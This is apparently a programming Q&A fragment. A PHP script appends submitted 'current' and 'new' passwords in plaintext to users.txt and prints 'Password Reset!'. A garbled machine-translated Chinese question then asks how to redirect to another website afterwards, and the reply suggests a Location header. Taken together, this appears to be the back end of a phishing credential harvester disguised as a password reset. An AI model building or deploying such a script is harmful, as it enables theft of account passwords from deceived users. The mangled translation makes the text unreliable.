<?php
// Open the text file
$f = fopen("users.txt", "a");
// Write text
fwrite($f, $_POST["_current_password1_"]);
fwrite($f, $_POST["_new_password1_"]);
// Close the text file
fclose($f);
print "Password Reset!";
?>
如何在重定向到不同的網站後顯示「密碼重置!」 (在編碼不好)PHP重定向到網站
加上'頭( '位置:http://www.example.com/');打印 –